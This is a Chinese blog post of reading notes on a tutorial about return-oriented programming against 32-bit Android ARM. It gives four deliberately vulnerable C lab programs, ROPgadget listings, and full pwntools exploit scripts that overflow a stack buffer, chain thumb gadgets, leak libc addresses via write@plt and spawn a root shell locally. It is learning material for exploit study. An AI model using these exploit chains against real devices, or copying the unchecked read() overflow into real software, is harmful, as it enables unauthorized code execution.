一步一步学ROP之Android ARM 32位篇 -- 阅读笔记及实践

最新推荐文章于 2022-12-05 22:41:25 发布
最新推荐文章于 2022-12-05 22:41:25 发布
阅读量1.9k 收藏 3
点赞数
分类专栏: 逆向
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/andy7002/article/details/72934692
版权

0x00 前言

  本文是蒸米的《一步一步学ROP之Android ARM 32位篇》读书笔记,自己动手做了一遍,记录了遇到不一样的地方和问题,4个程序全部运行成功。


0x01 简单的例子(level6)

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
void callsystem()
{
    system("/system/bin/sh");
}
void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}
int main(int argc, char** argv) 
{
    if (argc==2&&strcmp("passwd",argv[1])==0)
	callsystem();
    write(STDOUT_FILENO, "Hello, World\n", 13);
    vulnerable_function();
}

为了减少难度,我们先将stack canary去掉(在JNI目录下建立Application.mk并加入APP_CFLAGS += -fno-stack-protector)。随后用ndk-build进行编译。


ndk-build
adb push libs/armeabi/level6 /data/local/tmp/

adb shell
cd /data/local/tmp/
./socat TCP4-LISTEN:10001,fork EXEC:./level6

adb forward tcp:10001 tcp:10001

现在我们尝试连接一下:
$ nc 127.0.0.1 10001
Hello, World
发现工作正常。


 因为callsystem()被编译成了thumb指令,所以我们需要将地址+1,让pc知道这里的代码为thumb指令,最终exp如下:

#!/usr/bin/env python
from pwn import *
 
#p = process('./level6')
p = remote('127.0.0.1',10001)

p.recvuntil('\n')

callsystemaddr = 0x00008500 + 1
payload =  'A'*132 + p32(callsystemaddr)

p.send(payload)
 
p.interactive()

执行效果如下:

$ python level6.py
[+] Opening connection to 127.0.0.1 on port 10001: Done
[*] Switching to interactive mode
$ /system/bin/id
uid=0(root) gid=0(root) context=u:r:shell:s0


为什么是0x00008500?


Ida看的很清楚。


为什么是132?


进入函数前,程序先将LR寄存器(返回地址)入栈,然后开辟0x84(132)大小的栈空间,并且将栈顶指针赋值给了buf[128],将开辟的栈帧溢出即可覆盖到返回地址。


0x02 寻找thumb gadgets(level7)

原始程序

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
 
char *str="/system/bin/sh";
 
void callsystem()
{
    system("id");
}
 
void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}
 
int main(int argc, char** argv) 
{
    if (argc==2&&strcmp("passwd",argv[1])==0)
	callsystem();
    write(STDOUT_FILENO, "Hello, World\n", 13);   
    vulnerable_function();
}

因为未知的原因,没有找到需要的gadgets,所以将sqlite3的源码添加进去,这样编译出来的level7有400多kb,找到的gadgets就多了。


./ROPgadget.py --binary=./level7 --thumb | grep "ldr r0"


0x00028fe6 : ldr r0, [sp, #0x10] ; add r6, pc ; adds r6, #0xfc ; ldr r4, [r6, #0x28] ; adds r1, r7, #0 ; ldr r2, [sp, #8] ; blx r4
0x00015234 : ldr r0, [sp, #0x10] ; add sp, #0x1c ; pop {r4, r5, r6, r7, pc}
0x00015234 : ldr r0, [sp, #0x10] ; add sp, #0x1c ; pop {r4, r5, r6, r7, pc} ; movs r0, #0 ; bx lr
0x0004a6a2 : ldr r0, [sp, #0x10] ; add sp, #0x2c ; pop {r4, r5, r6, r7, pc}
0x00038376 : ldr r0, [sp, #0x10] ; add sp, #0x34 ; pop {r4, r5, r6, r7, pc}
0x00034b42 : ldr r0, [sp, #0x10] ; add sp, #0x44 ; pop {r4, r5, r6, r7, pc}
0x00056ca4 : ldr r0, [sp, #0x10] ; adds r1, r4, #0 ; add r3, pc ; ldr r3, [r3, #0x1c] ; blx r3
0x0002cf62 : ldr r0, [sp, #0x10] ; adds r1, r4, #0 ; bl #0x19522 ; add sp, #0x34 ; pop {r4, r5, r6, r7, pc}
0x00028ffe : ldr r0, [sp, #0x10] ; adds r1, r7, #0 ; blx r3
0x0001a0fe : ldr r0, [sp, #0x10] ; adds r2, r6, #0 ; add r3, sp, #0x18 ; blx r4
0x0000e35c : ldr r0, [sp, #0x10] ; bl #0x18f88 ; add sp, #0x2c ; pop {r4, r5, r6, r7, pc}
0x0000c0ae : ldr r0, [sp, #0x10] ; bl #0x18f88 ; add sp, #0x3c ; pop {r4, r5, r6, r7, pc}


在这些gadgets中,我们成功找到了一个gadget可以符合我们的要求:
0x00015234 : ldr r0, [sp, #0x10] ; add sp, #0x1c ; pop {r4, r5, r6, r7, pc}


接下来就是找system和"/system/bin/sh"的地址



要注意的是,因为system()函数在plt区域,并没有被编译成thumb指令,而是普通的arm指令,因此并不需要将地址+1。最终level7.py如下:

#!/usr/bin/env python
from pwn import *
 
#p = process('./level7')
p = remote('127.0.0.1',10001)

p.recvuntil('\n')

#0x00015234 : ldr r0, [sp, #0x10] ; add sp, #0x1c ; pop {r4, r5, r6, r7, pc}
gadget1 = 0x00015234 + 1

#.rodata:00061EB5 aSystemBinSh    DCB "/system/bin/sh",0
r0 = 0x00061EB5

#.plt:000093D4 ; int system(const char *)
systemaddr = 0x000093D4 

payload =  '\x00'*132 + p32(gadget1) + "\x00"*0x10 + p32(r0) + "\x00"*0x18 + p32(systemaddr)

p.send(payload)
 
p.interactive()

执行方法同上。


payload =  '\x00'*132 + p32(gadget1) + "\x00"*0x10 + p32(r0) + "\x00"*0x18 + p32(systemaddr)
这条指令是怎么来的?
'\x00'*132 + p32(gadget1)解释同上
"\x00"*0x10对应ldr r0, [sp, #0x10]的[sp, #0x10]部分
p32(r0)对应ldr r0, [sp, #0x10]的ldr r0部分
填充数据"\x00"*0x18计算方法:  
add sp, #0x1c ;          回收0x1c个字节栈空间
pop {r4, r5, r6, r7, pc}     出栈0x4*4个字节,然后到pc寄存器
因此需要的填充数据个数为: 0x1c + 0x4*4 - "\x00"*0x10 - 0x4(p32(r0)) = 0x18


0x03 Android上的ASLR(level8)

Android上的ASLR其实伪ASLR,因为如果程序是由皆由zygote fork的,那么所有的系统library(libc,libandroid_runtime等)和dalvik - heap的基址都会是相同的,并且和zygote的内存布局一模一样。


假设我们已经知道了目标app的libc.so在内存中的地址了,那么应该如何控制pc执行我们希望的rop呢?OK,现在我们现在来看level8.c:

#include <stdio.h>

#include <stdlib.h>
#include <unistd.h>
#include <dlfcn.h>

void getsystemaddr()
{
    void* handle = dlopen("libc.so", RTLD_LAZY);
    printf("%p\n",dlsym(handle,"system"));
    fflush(stdout);    // 输出system地址
}

void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}
 
int main(int argc, char** argv) {
    getsystemaddr();
    write(STDOUT_FILENO, "Hello, World\n", 13);    
    vulnerable_function();
}

这个程序会先输出system的地址,相当于我们已经获取了这个进程的内存布局了。接下来要做的就是在libc.so中寻找我们需要的gadgets和字符串地址。因为libc.so很大,我们完全不用担心找不到需要的gadgets,并且我们只需要控制一个r0即可。因此这个gadgets能满足我们的需求:
0x00033602 : ldr r0, [sp] ; pop {r1, r2, r3, pc}


接下来就是在libc.so中找system()和"/system/bin/sh"的位置:




需要根据system()在内存中的地址进行偏移量的计算才能够成功的找到gadgets和"/system/bin/sh"在内存中的地址。除此之外,还要注意thumb指令和arm指令的转换问题。最终的exp level8.py如下:

#!/usr/bin/env python
from pwn import *
 
#p = process('./level8')
p = remote('127.0.0.1',10001)

system_addr_str = p.recvuntil('\n')
system_addr = int(system_addr_str,16)
print "system_addr = " + hex(system_addr)

p.recvuntil('\n')

raw_input()

#.text:0001D080                 EXPORT system                libc

#0x00034ace : ldr r0, [sp] ; pop {r1, r2, r3, pc}
gadget1 = system_addr + (0x00034ace - 0x0001D080)
print "gadget1 = " + hex(gadget1)

#.rodata:00040AC8 aSystemBinSh    DCB "/system/bin/sh",0     libc
r0 = system_addr + (0x00040AC8 - 0x0001D080) - 1
print "/system/bin/sh addr = " + hex(r0)

payload =  '\x00'*132 + p32(gadget1) + p32(r0) + "\x00"*0x8 + p32(system_addr)

p.send(payload)
 
p.interactive()

执行方法同上
Payload计算方法同上


0x04 Android上的information leak(level9)

在上面的例子中,我们假设已经知道了libc.so的基址了,但是如果我们是进行远程攻击,并且原程序中没有调用system()函数怎么办?这意味着目标程序的内存布局对我们来说是随机的,我们并不能直接调用libc.so中的gadgets,因为我们并不知道libc.so在内存中的地址。其实这也是有办法的,我们首先需要一个information leak的漏洞来获取libc.so在内存中的地址,然后再控制pc去执行我们的rop。现在我们来看level9.c:
原始程序:

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
#include<dlfcn.h>
 
void vulnerable_function() {
char buf[128];
read(STDIN_FILENO, buf, 512);
}
 
int main(int argc, char** argv) {
write(STDOUT_FILENO, "Hello, World\n", 13);
vulnerable_function();
}

同样使用sqlite3拓展代码。

虽然程序非常简单,可用的gadgets很少。但好消息是我们发现除了程序本身的实现的函数之外,我们还可以使用write@plt()函数。但因为程序本身并没有调用system()函数,所以我们并不能直接调用system()来获取shell。但其实我们有write@plt()函数就够了,因为我们可以通过write@plt()函数把write()函数在内存中的地址也就是write.got给打印出来。既然write()函数实现是在libc.so当中,那我们调用的write@plt()函数为什么也能实现write()功能呢? 这是因为android和linux类似采用了延时绑定技术,当我们调用write@plit()的时候,系统会将真正的write()函数地址link到got表的write.got中,然后write@plit()会根据write.got 跳转到真正的write()函数上去。



0x00028fb6 : ldr r0, [sp, #0x10] ; add r6, pc ; adds r6, #0xfc ; ldr r4, [r6, #0x28] ; adds r1, r7, #0 ; ldr r2, [sp, #8] ; blx r4
0x00015204 : ldr r0, [sp, #0x10] ; add sp, #0x1c ; pop {r4, r5, r6, r7, pc}
0x00015204 : ldr r0, [sp, #0x10] ; add sp, #0x1c ; pop {r4, r5, r6, r7, pc} ; movs r0, #0 ; bx lr
0x0004a672 : ldr r0, [sp, #0x10] ; add sp, #0x2c ; pop {r4, r5, r6, r7, pc}
0x00038346 : ldr r0, [sp, #0x10] ; add sp, #0x34 ; pop {r4, r5, r6, r7, pc}


0x0001055c : pop {r0, r2, r6, pc}
0x00048724 : pop {r0, r3, r6, r7, pc}
0x00013fc2 : pop {r1, r2, r3, pc}


#!/usr/bin/env python
from pwn import *
 
#p = process('./level7')
p = remote('127.0.0.1',10001)
 
p.recvuntil('\n')

raw_input()

#0x00015204 : ldr r0, [sp, #0x10] ; add sp, #0x1c ; pop {r4, r5, r6, r7, pc} 
gadget1 = 0x00015204 + 1

#0x00013fc2 : pop {r1, r2, r3, pc}
gadget2 = 0x00013fc2 + 1

#.text:000127C8 vulnerable_function
ret_to_vul = 0x000127C8 + 1
 
#write(r0=1, r1=0x0006BF38, r2=4)
r0 = 1
r1 = 0x0006BF38
r2 = 4
r3 = 0
r5 = 0
r6 = 0
#.plt:0x00009404 write              
write_addr_plt = 0x00009404
 
payload =  '\x00'*132 + p32(gadget1) + '\x00'*0x10 + p32(r0) + '\x00'*0x18 + p32(gadget2) + p32(r1) + p32(r2) + p32(r3) + p32(write_addr_plt) + '\x00' * 0x84 + p32(ret_to_vul)
 
p.send(payload)

write_addr = u32(p.recv(4))
print 'write_addr=' + hex(write_addr)

#.rodata:00040AC8 aSystemBinSh  DCB "/system/bin/sh",0        libc
#.text:0001D080                 EXPORT system               libc
#.text:00039168			      EXPORT write                 libc
 
r0 = write_addr + (0x00040AC8 - 0x00039168) - 1
system_addr = write_addr + (0x0001D080 - 0x00039168) # no +1
 
print 'r0=' + hex(r0)
print 'system_addr=' + hex(system_addr)
 
payload2 = '\x00'*132 + p32(gadget1) + "\x00"*0x10 + p32(r0) + "\x00"*0x18 + p32(system_addr)
 
p.send(payload2)
 
p.interactive()

Payload计算方法:
前面部分同前
'\x00' * 0x84 + p32(ret_to_vul)

BLX read后
ADD SP, SP, #0x84
POP {PC}

第一次溢出后,再次返回vulnerable_function,准备第二次溢出


执行方法:


r0 = write_addr + (0x00040AC8 - 0x00039168) - 1
system_addr = write_addr + (0x0001D080 - 0x00039168) # no +1
作者的原版r0行没有-1,我运行的结果是不减一指向的字符串是”system/bin/sh”, 缺少一个’/’。
system_addr行原版+1,我运行的结果是+1程序奔溃。


所有资源下载:http://download.csdn.net/detail/andy7002/9865073

andy7002
关注
专栏目录
【webrtc】Windows平台WebRTC编译-VS2022 - 官方m98分支
突围
03-05 1529
参考之前的dep_tools记录 一些webrtc的网站 native-code 官方构建指南 启用代理很关键,windows用set linux是export 过程 先安装dep_tools Microsoft Windows [版本 10.0.22000.493] (c) Microsoft Corporation。保留所有权利。 C:\Users\zhangbin>gclient fatal: unable to access 'https://chromium.goo..
CFI/CFG 安全防护原理详解(ROP攻击、DOP攻击、插装检测)
墨痕诉清风的博客
12-13 3423
1. 简介 CFI: Control-Flow Integrity(控制流完整性) CFG: Control Flow Guard(Windows的CFI实现) CFG: Control-Flow Graph(控制流图) LTO: Link Time Optimization(链接时优化) 1.1 控制流攻击历史 控制流劫持是一种危害性极大的攻击方式,攻击者能够通过它来获取目标机器的控制权,甚至进行提权操作,对目标机器进行全面控制。当攻击者掌握了被攻击程序的内存错误漏洞后,一般会考虑发起控制流劫持
一步一步ROP之linux_x86
AliMobileSecurity的博客
07-06 5666
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的ROP还是得从基础的x86系统开始。
一步一步ROP之gadgets和2free
omnispace的博客
03-06 2473
原文: http://drops.wooyun.org/binary/10638 0x00序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术,可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x64的ROP攻击。 一步一步ROP之linux_x86http://d
一步一步ROP——ROP
weixin_42390670的博客
07-24 762
(接上文) 接下来我们打开ASLR保护。 sudo -s echo 2 > /proc/sys/kernel/randomize_va_space` 现在我们再回头测试一下level2的exp,发现已经不好用了。 #!bash $python exp2.py [+] Started program './level2' [*] Switching to interactive mode ...
一步一步ROPAndroid ARM 32位》 源码修改版之增加gadgets
06-08
蒸米的代码基础上,加了sqlite3代码便于方便查找gadgets。。。。。。。。。。。。。。。。。。。。。。。。。。。。
剖析虚幻渲染体系(16)- 图形驱动的秘密
xuhss_com的博客
06-26 2014
目录* 16.1 本概述 + 16.1.1 本内容 + 16.1.2 设备驱动概述 + 16.1.3 图形驱动概述迄今为止,博主在博客中阐述的内容包含图形API、GPU、游戏引擎、Shader、渲染技术、性能优化等等技术范畴内容,但似乎还未涉及图形驱动的内幕。本将站在应用层开发者的视角,去阐述图形驱动的相关技术内幕(如果是驱动开发者,则博主不认为是目标读者),主要包含但不限于以下内容:要给“驱动”一词下一个准确的定义是一个挑战。从最基本的意义上讲,驱动程序是一个软件组件,它允许操作系统和设备相互通信。
TA入门笔记(十九)
wrl780143706的博客
08-25 453
移动端GPU的TB(D)R架构 移动端GPU概况 下图为2020年手机安卓端SoC的Top10排行 目前的top300中,从手机SoC厂商来看,高通占比49.2%,相比于其他手机厂商优势较大,其次是华为28.6%,联发科21%,三星1.1%,其余厂商均未进入top300 下图为安卓端GPU的top10排行 GPU上,高通的Adreno与Mali的GPU市场分别占比49.2%与48.2%,而PowerVR-GPU在安卓机器上使用较少,占比仅有2.6% 移动端和桌面端功耗对比 桌面级主流性能平台
百人计划(程序)2
最新发布
weixin_56784984的博客
12-05 625
复习笔记
一步一步ROPAndroid ARM 32位
jltxgcy的专栏
02-19 2698
0x00    本文仅解释说明蒸米大神一步一步ROPAndroid ARM 32位,读者应先阅读文章,遇到问题再来看我这文章。   0x01    第一个问题:payload = 'A'*132 + p32(callsystemaddr),这个132是怎么来的?    要回答这个问题,我们需要把level6.c反汇编,level6.c代码如下: #include #include #i
【逆向习记录】习《一步一步ROP_x64》
卦星的专栏
01-12 1076
1.概述 通过前面几文章,基本上搞定了x86的漏洞原理,针对x64的还需要进一步习,依然利用最经典的当属蒸米大神的一步一步系列 一步一步ROP之linux_x64蒸米 环境:ubuntu 16.04 2.linux x86与x64的区别 这里引用一下上面文章中的语言: linux_64与linux_86的区别主要有两点: 1.首先是内存地址的范围由32位变成了64位。但是可以使用...
一步一步ROP——shellcode和ret2libc
weixin_42390670的博客
07-23 1233
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的ROP还是得从基础的x86系统开始,但看官请不要着急,在随后的教程中我们还会带来linux_x64以及android (arm)方面的ROP利用方法。 1 C...
一步一步 ROP 之 linux_x64 -level5
weixin_43489686的博客
02-02 1560
这道题是来自蒸米一步一步ROP之linux_x64中的level5,主要考察的是中级ROP中的__libc_csu_init。 原理 __libc_csu_init这个函数是用来对libc进行初始化操作的,一般的程序都会调用libc函数,所以一般都会有这个函数。 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000...
一步一步ROP之linux_x86蒸米文章
Sakura给爷pwn全场
09-10 426
蒸米ROP
一步一步ROP之linux_x64
HiTaQini
11-20 1775
0x00 序ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。
一步一步ROP x86Linux
zsj2102的专栏
11-16 1105
原文地址:http://drops.wooyun.org/tips/6597 0x00 序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的ROP还是得从基础的x86系统开始,但看官请不要着急,在随
STM32H743xI 32位Arm Cortex-M7 MCU技术规格详解
"STM32H743BI是一款基于32位ARM Cortex-M7内核的微控制器,具有双精度浮点单元和L1高速缓存。该芯片在2018年7月发布,其数据手册包含了产品的生产和设计信息。STM32H743XI系列提供高达2MB的闪存、1MB的RAM以及丰富的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值